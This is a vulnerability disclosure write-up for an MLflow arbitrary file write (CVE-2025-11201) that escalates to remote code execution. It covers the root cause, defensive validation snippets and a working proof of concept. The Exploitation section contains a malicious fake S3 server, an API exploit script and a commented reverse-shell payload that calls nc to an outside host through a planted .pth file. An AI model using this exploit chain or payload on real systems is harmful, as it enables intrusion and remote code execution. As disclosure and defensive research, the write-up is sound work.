CVE-2025-11201 Arbitrary File Write → Remote Code Execution in MLflow

Written by Muhammad Fadilullah Dzaki (@0xboyz)

Story

One afternoon, I was looking through MLflow's artifact implementation, just to see how it supports remote storage, when a small detail caught my eye: the way MLflow fetches artifacts from an S3-like endpoint is more flexible than is safe. That flexibility opens the door to a serious attack vector: planting files at arbitrary paths on the target host while MLflow downloads artifacts. Under a few additional conditions, this can escalate into Remote Code Execution (RCE). Below, I recount the discovery, outline the technical mechanism, explain why it is dangerous for the ML supply chain, and show how it could be exploited.

A brief background on MLflow, artifacts, and boto3

MLflow provides an artifact mechanism for storing models and related assets. When the artifact source points to an S3-like provider, MLflow uses a common Python client to read the object list and download the required objects. In many deployments, boto3 is already installed, sometimes by MLflow itself, sometimes due to other dependencies, and local AWS credentials often exist on the developer host or container.

Vulnerable functions: root cause (full code blocks)

Below are the functions I inspected, exactly as they appeared before the patch:

def parse_s3_compliant_uri(self, uri):
    # r2 uri format(virtual): r2://<bucket-name>@<account-id>.r2.cloudflarestorage.com/<path>
    parsed = urlparse(uri)
    if parsed.scheme != "r2":
        raise Exception(f"Not an R2 URI: {uri}")

    host = parsed.netloc
    path = parsed.path

    bucket = host.split("@")[0]
    if path.startswith("/"):
        path = path[1:]
    return bucket, path

@staticmethod
def convert_r2_uri_to_s3_endpoint_url(r2_uri):
    host = urlparse(r2_uri).netloc
    host_without_bucket = host.split("@")[-1]
    return f"https://{host_without_bucket}"

def list_artifacts(self, path=None):
    artifact_path = self.bucket_path
    dest_path = self.bucket_path
    if path:
        dest_path = posixpath.join(dest_path, path)
    infos = []
    prefix = dest_path + "/" if dest_path else ""
    s3_client = self._get_s3_client()
    paginator = s3_client.get_paginator("list_objects_v2")
    results = paginator.paginate(Bucket=self.bucket, Prefix=prefix, Delimiter="/")
    for result in results:
        # Subdirectories will be listed as "common prefixes" due to the way we made the request
        for obj in result.get("CommonPrefixes", []):
            subdir_path = obj.get("Prefix")
            self._verify_listed_object_contains_artifact_path_prefix(
                listed_object_path=subdir_path, artifact_path=artifact_path
            )
            subdir_rel_path = posixpath.relpath(path=subdir_path, start=artifact_path)
            if subdir_rel_path.endswith("/"):
                subdir_rel_path = subdir_rel_path[:-1]
            infos.append(FileInfo(subdir_rel_path, True, None))
        # Objects listed directly will be files
        for obj in result.get("Contents", []):
            file_path = obj.get("Key")
            self._verify_listed_object_contains_artifact_path_prefix(
                listed_object_path=file_path, artifact_path=artifact_path
            )
            file_rel_path = posixpath.relpath(path=file_path, start=artifact_path)
            file_size = int(obj.get("Size"))
            infos.append(FileInfo(file_rel_path, False, file_size))
    return sorted(infos, key=lambda f: f.path)

Root cause analysis

Two related weaknesses combine to create the issue:

URI parsing and endpoint trust: R2 URIs were converted to HTTPS endpoints without strict hostname validation, enabling attacker-controlled endpoints to serve malicious listings.

Path handling logic: remote Keys were validated with a string prefix check and passed into posixpath.relpath(), but the code never confirmed that the resulting path stays within the artifact root.
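
To make the first weakness concrete, here is a minimal sketch. It copies the pre-patch conversion logic shown above into a standalone function and places a hostname allowlist check next to it. The helper is_trusted_r2_host, the TRUSTED_SUFFIX constant, and the example URIs are assumptions for illustration only; this is not MLflow's actual fix.

```python
from urllib.parse import urlparse

# Assumption: only Cloudflare's R2 domain is acceptable. A real deployment
# might need a configurable allowlist instead.
TRUSTED_SUFFIX = ".r2.cloudflarestorage.com"


def convert_r2_uri_to_s3_endpoint_url(r2_uri):
    """Standalone copy of the pre-patch conversion logic shown above."""
    host = urlparse(r2_uri).netloc
    host_without_bucket = host.split("@")[-1]
    return f"https://{host_without_bucket}"


def is_trusted_r2_host(r2_uri):
    """Hypothetical check: accept only r2:// URIs whose host is under the trusted suffix."""
    parsed = urlparse(r2_uri)
    if parsed.scheme != "r2":
        return False
    # .hostname drops the "<bucket>@" userinfo part and any port, and lowercases.
    host = parsed.hostname or ""
    return host.endswith(TRUSTED_SUFFIX)


legit = "r2://my-bucket@abc123.r2.cloudflarestorage.com/models"
crafted = "r2://attacker.example/a/b/c/d/e/f/"

# Without validation, the crafted host simply becomes the S3 endpoint.
endpoint_for_crafted = convert_r2_uri_to_s3_endpoint_url(crafted)
print(endpoint_for_crafted)         # https://attacker.example
print(is_trusted_r2_host(legit))    # True
print(is_trusted_r2_host(crafted))  # False
```

The suffix includes the leading dot, so a host such as evil-r2.cloudflarestorage.com.attacker.example does not match.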

Why this is exploitable

posixpath.relpath() alone is not a security boundary; it only returns a textual relative path. If an attacker supplies a Key with many ../ segments, the resulting relative path can itself begin with ../, so when it is joined to a local artifact root and written without canonicalization (os.path.realpath), the file can land outside the intended directory. A simple string-based prefix check does not catch this, because the traversal segments come after the expected prefix and the Key still passes the naive test.
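
The behaviour can be reproduced with nothing but the standard library. In the sketch below, the artifact path and Key mirror the values used in the PoC further down. The startswith() test is an assumed approximation of the pre-patch prefix verification, not a copy of it.

```python
import posixpath

artifact_path = "a/b/c/d/e/f"
listed_key = "a/b/c/d/e/f/g/../../../../../../../../../../tmp/this_is_payload"

# Naive check, assumed to approximate the pre-patch prefix verification.
passes_prefix_check = listed_key.startswith(artifact_path)

# relpath normalizes the ".." segments, but it happily returns a path that
# climbs above the starting directory. The exact number of leading ".."
# segments depends on the current working directory.
rel = posixpath.relpath(path=listed_key, start=artifact_path)
escapes_root = rel.split("/")[0] == ".."

print(passes_prefix_check)  # True
print(escapes_root)         # True
```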

The core of the vulnerability

MLflow processes the object listing returned by the S3-like endpoint without ensuring that each object key is free of path traversal segments (../..), so the target path on the filesystem can end up outside the allowed artifact directory. An attacker who controls the S3-like host can therefore direct MLflow to download an object and write it to an arbitrary location on the host, including sensitive locations, which can escalate to RCE.
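
One way to close that gap is to reject suspicious keys before any relative path is computed. The following is a sketch under stated assumptions: key_is_safe is a hypothetical helper, not part of MLflow, and it assumes keys use "/" as the separator, as S3 keys do.

```python
import posixpath


def key_is_safe(key, artifact_path):
    """Hypothetical validator: True only if the key stays under artifact_path."""
    # Reject absolute keys and any key carrying a ".." segment outright.
    if key.startswith("/") or ".." in key.split("/"):
        return False
    root = posixpath.normpath(artifact_path)
    if root == ".":  # empty artifact path: any traversal-free key is acceptable
        return True
    # Compare normalized forms on a segment boundary, not as raw strings.
    normalized = posixpath.normpath(key)
    return normalized == root or normalized.startswith(root + "/")


print(key_is_safe("a/b/c/d/e/f/g/model.pkl", "a/b/c/d/e/f"))            # True
print(key_is_safe("a/b/c/d/e/f/g/../../../../tmp/x", "a/b/c/d/e/f"))    # False
print(key_is_safe("a/b/c/d/e/fake/model.pkl", "a/b/c/d/e/f"))           # False
```

The third call shows why the comparison is done on a segment boundary: a raw startswith("a/b/c/d/e/f") would accept a/b/c/d/e/fake/model.pkl.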

Exploitation

server.py

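from flask import Flask, request

# Configure payload file
file_path = '../../../../../../../../../../tmp/this_is_payload'
file_contents = 'You have been Hacked'

# For RCE testing, enable the following lines:
#file_path = '../../../../../../../../usr/local/lib/python3.10/site-packages/random.pth'
#file_contents = (
#    "import os; os.system('rm /tmp/f;mkfifo /tmp/f;"
#    "cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f');"
# )

app = Flask(__name__)


@app.route("/<domain>/")
def s3_handler(domain):
    # GetBucketLocation request
    if 'location' in request.args:
        return (
            '<?xml version="1.0" encoding="UTF-8"?>\n'
            '<LocationConstraint xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
            'region-code</LocationConstraint>'
        )
    # ListObjectsV2 request: return a single object whose Key contains traversal segments
    if 'list-type' in request.args:
        return (
            f'<?xml version="1.0" encoding="UTF-8"?>\n'
            '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">\n'
            '  <Name>unused</Name>\n'
            '  <Prefix>unused</Prefix>\n'
            '  <KeyCount>1</KeyCount>\n'
            '  <MaxKeys>1000</MaxKeys>\n'
            '  <Delimiter>/</Delimiter>\n'
            '  <IsTruncated>false</IsTruncated>\n'
            '  <EncodingType>url</EncodingType>\n'
            '  <Contents>\n'
            f'    <Key>a/b/c/d/e/f/g/{file_path}</Key>\n'
            '    <LastModified>2024-02-13T16:34:20.000Z</LastModified>\n'
            '    <ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>\n'
            '    <Size>123</Size>\n'
            '    <StorageClass>STANDARD</StorageClass>\n'
            '  </Contents>\n'
            '</ListBucketResult>'
        )
    return 'fallback'


@app.route("/<domain>/<path:filepath>")
def file_response(domain, filepath):
    # GetObject request: serve the payload regardless of the requested key
    return file_contents


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=4444)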

exploit.py

import requests


class MLFlowExploit:
    """Proof-of-Concept for model artifact abuse via crafted source path."""

    def __init__(self, target_url, attacker_host, model_id):
        self.api = target_url
        self.attacker = attacker_host
        self.model = model_id
        self.session = requests.Session()

    def register_model(self):
        """Step 1: Register a new model"""
        endpoint = f"{self.api}/ajax-api/2.0/mlflow/registered-models/create"
        payload = {"name": self.model}
        response = self.session.post(endpoint, json=payload)
        print("Model Registration →", response.status_code, response.content)
        return response

    def create_version(self):
        """Step 2: Create model version with crafted source"""
        endpoint = f"{self.api}/ajax-api/2.0/mlflow/model-versions/create"
        crafted_source = f"r2://{self.attacker}/a/b/c/d/e/f/"
        payload = {
            "name": self.model,
            "source": crafted_source
        }
        response = self.session.post(endpoint, json=payload)
        print("Version Creation →", response.status_code, response.content)
        return response

    def fetch_artifact(self, version):
        """Step 3: Retrieve artifact from created version"""
        endpoint = f"{self.api}/model-versions/get-artifact"
        params = {
            "path": "g",
            "name": self.model,
            "version": version
        }
        response = self.session.get(endpoint, params=params)
        print("Artifact Retrieval →", response.status_code, response.content)
        return response


# === Execution ===
if __name__ == "__main__":
    exploit = MLFlowExploit(
        target_url="http://127.0.0.1:4444",
        attacker_host="3422-[...].ngrok-free.app",
        model_id="exp"
    )

    exploit.register_model()
    version_response = exploit.create_version()
    version_id = version_response.json().get("model_version", {}).get("version")
    exploit.fetch_artifact(version_id)

Exploit Concept

Attacker controls or spoofs an R2/S3 endpoint.

The endpoint returns a listing containing Keys with traversal segments (e.g. a/b/../../../../tmp/pwned).

MLflow processes the listing, computes a relpath, and writes to the resolved path, which lies outside the artifact root.

Attacker arranges the write to target an execution surface (Python .pth, plugin dir, rc files) to achieve RCE.
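
The write in the third step is the last point at which the chain can be broken. A minimal sketch of a containment check on the local destination, assuming a hypothetical helper resolve_inside that is called before every download (this is not MLflow's actual patch):

```python
import os
import tempfile


def resolve_inside(root_dir, relative_path):
    """Hypothetical helper: return the absolute destination, or raise if it escapes root_dir."""
    # realpath canonicalizes ".." segments and resolves symlinks in existing components.
    root_real = os.path.realpath(root_dir)
    dest_real = os.path.realpath(os.path.join(root_real, relative_path))
    if os.path.commonpath([root_real, dest_real]) != root_real:
        raise ValueError(f"refusing to write outside {root_real}: {relative_path!r}")
    return dest_real


with tempfile.TemporaryDirectory() as root:
    # A well-behaved relative path resolves to a location under the root.
    ok = resolve_inside(root, "g/model.pkl")
    try:
        resolve_inside(root, "../../../../tmp/this_is_payload")
        blocked = False
    except ValueError:
        blocked = True

print(blocked)  # True
```

Comparing canonical paths with os.path.commonpath avoids the segment-boundary pitfalls of a raw string prefix test.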

Impact

Severity: High (CVSS 8.1)

Vector: Network

Privileges: None required on target host to trigger write

Impact: Arbitrary file write leading to Remote Code Execution

References

Source: optimized_s3_artifact_repo.py, lines 272–302 (GitHub)

Advisory / tracking: CVE-2025-11201, ZDI-25-931 (Zero Day Initiative)

© 2025 Muhammad Fadilullah Dzaki (@0xboyz) Responsible disclosure & security research
